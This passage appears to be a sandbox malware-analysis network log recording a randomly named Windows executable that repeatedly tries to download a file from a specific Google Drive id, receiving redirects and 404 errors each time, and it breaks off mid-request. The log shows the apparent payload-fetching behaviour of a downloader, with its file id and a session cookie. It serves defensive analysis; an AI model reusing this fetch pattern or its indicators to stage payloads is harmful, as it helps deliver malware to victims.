                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:32 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-laBNzsWtaoWMY9rnk9sxWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:33 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZFm-S6LGb5QtKWiqLwd8Lw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    78 | 192.168.2.7 | 52263 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:34 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:34 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-zxPubz3oR14HgR85QyahmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    79 | 192.168.2.7 | 52264 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:35 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTanNM34eTwf832VRdI7g2hcBWVzS6Mxm5pK_tkR-eCaa9_Di4DLVsJ4OLf-s2mjb-7
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:35 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-90iwcmhoHxf74y5pcud6Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:35 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fmnPt4ZEuIrM3y3m4pCvOQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    80 | 192.168.2.7 | 52265 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:36 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:36 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-HdhV9dA9ykcnTNfoHDBh3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    81 | 192.168.2.7 | 52266 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:37 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:37 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQhJzHgozB75gam0sM-sATueUkc-xiOce4FQxkww4vUwqrhlTNm0doDgK0_ngwFrbnt
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:37 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-7UH3_v7O71nzk3AW6Gnnxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:37 UTC | 1652 | IN |
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xAhAonMle_O5-pK_tByggA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    82 | 192.168.2.7 | 52267 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:38 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:39 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:38 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-qFjxLtb6fcR8PU6dktDtXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    83 | 192.168.2.7 | 52268 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:39 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:40 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC7Mvo9V69fHwQK2FW1Nm7173K1I8fBZLfKNAM4NzSb8bqdw8B1fab-0IM6WI9Gnr8kD
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:39 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-v6NbmKre5m67uHZkn0vfWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:40 UTC | 1652 | IN |
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="noIrTq4s513xX9JVF-qVjw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    84 | 192.168.2.7 | 52269 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:41 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:41 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-WNej71GuGrKaNXTCsovjuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    85 | 192.168.2.7 | 52270 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:42 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:42 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQl6mRH8Y8IaoWcTpfIUUHxBnug6OaSznTs70oW8RIncvHadVuhwXmnZlGGU91BTl1c
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:42 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-ybTtXvGGOtPWe8der0jKEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:42 UTC | 1652 | IN |
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ew_GHPRS8hmW9sxcw_gb4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    86 | 192.168.2.7 | 52271 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:43 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
